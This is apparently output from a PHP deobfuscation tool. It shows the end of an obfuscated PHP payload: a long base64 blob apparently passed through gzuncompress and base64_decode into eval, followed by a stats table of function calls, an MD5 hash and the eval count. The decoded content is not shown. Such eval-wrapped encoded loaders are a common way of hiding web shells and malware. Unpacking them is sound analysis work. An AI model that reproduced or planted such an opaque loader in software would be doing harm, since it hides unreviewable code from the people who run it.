rz5BKcXNFllltRZfWD2TXDF8yGQBekV0YZWZXxBTJW8LvERDxOC6F7g6ZDbFm3Q62xKR0G1fI4W/1BEtT1/KkcnJrAP+BerRErKjJX5zTNr9fjtb57Ig+/xoXH5RmPXUXxqj3zTAh636O7yvZTuGjRoHQyNfhEP8hI6gky+aJ9Iouy+mC6v2pBim1pfW1vUPN+SNTtySfzOM+X3S77dyHwCmAHLD++RLgGYRMS8TdJ3dcfKfi8ur9k12lcl15VaUetHHk8vL9k2XCEn0N1ZgAFqgfoiuU1w8U+8OtgQ9uRLkNN/uCbjOOyYXncuEJCwA6NAfVful717BTkCfv7rdRw2CT5P3nZYP7SpGxlKEBBpGx56QTE3wfURD9s1xWydo28WlJduaW05oLun8A0zZFTn/cHVBPheiPpMO+VwI+rxDPheLOkTHgQUJ9BS/W/pMuuTXk3e/nF0CpU0VNgieqQV6mvkYZOL1Iy0s/r5Nuket6pzA0Hs35DcI2SYwAUEaRmRnhyh5D86d0EjAHieJl1XAVORDQb36JhtP7WKjf2CEBoPTY1oznDciDfyorcgprJEEEiuG1u+TyynWkhPfJ3p5yHsapTQI7qHyxUiSwUucuyZVeSiHvjzyihqdaKm/wNCwEW1Pulx3H0xa936rVZOZeYFWv5994aSv8PopuQ8DHt122kUxDjmbhOKenyq54YurR3IaEMu3qFR/cFBr64GwAOyh7j1Ad/IJ/U3I28VcguNQU54srBYH/LCVu//8CrNau/oeipgG4pJGSpy+7uvzB16F0Cpdcx7ID0UEO5A5/8iSfPLm3RJ7Oz59DYoNUQdB3OnrTgs0BLz1E4gQBqU0OPdRL+j7o9LoY5BWIcKnDsp67BNal2fvzt5cEe7nTsULhmgeuVNBKznOF7/oEff9Ee5OIK33cozO+yrbWzLtzFGK6y0Mwde7N/BnYcG67gXZr5kw9rf30oOdUTFU4s7C7uAvxi6ZS8HP1QvLjHqzrkcPW9X2pzSasI/FVoacauPVye29hD38SrzFpw9y4N6ycze2yoetjNVbvPSmUvmMsJ/y2Ko1kSwmGkGaro07ahD36Xx4cvr+/MN6kQXKWOz7j+/fftrUTYCYCsSNe604BKwVdoyvhMdDySYcnx3WXv14xavWgEcVqd9huCSnqbGyRYzrEEWDVc3ZtbyQt3rCeq9PTj+Bn6nP2dY4jfR21hDBZnaXlWd3Ly5CTThn5Ncs4hEF2vtXM668kKwCXS0VcPkDFcmCg6eYtazsq/0+uHYL0kTSeGqBn4KP80v8mhGDL+0nU42abxounbA+fpHP8Jt841nKxpsY4xMasNAYTVOfP17c1ej37PKSP0I/PFaq/OJO3CYg7p2pWaFbb99dvD55R8oTd8X7F0XXiL+Bo8oxuvTKXqCPxHFau5szb6HOrXh3JVJvWuLAVpXAh6E67d7eLrlnVGLgpktqd06Ww3l8iNkOWDRRU9gwnpUXp8HhmtQvZpS4W3TaJzhF/8WjeV5AseDPSsEuFhy2yw0EOgii2io/ZsFBFiaGQ9HuEfz3guTNw4cffqhtk0DsH+uuXGOXO7s7JD9oQVGX9GAPIrWNTTKVykgTcf0W7iaVAendJmR9mgOObvp6qHlfpIr8/TeZwVF9E6d38Yj09uyK2DR0BEegafVz9a7FsqQeS/WninoeS5LlquxpqhLQ7ETHPII2T969q7nR/wEY+eRe')));
?>Function Calls
| gzuncompress | 1 |
| base64_decode | 1 |
Stats
| MD5 | 985197b2f79860ce671cdfb5cc3f8b06 |
| Eval Count | 1 |
| Decode Time | 80 ms |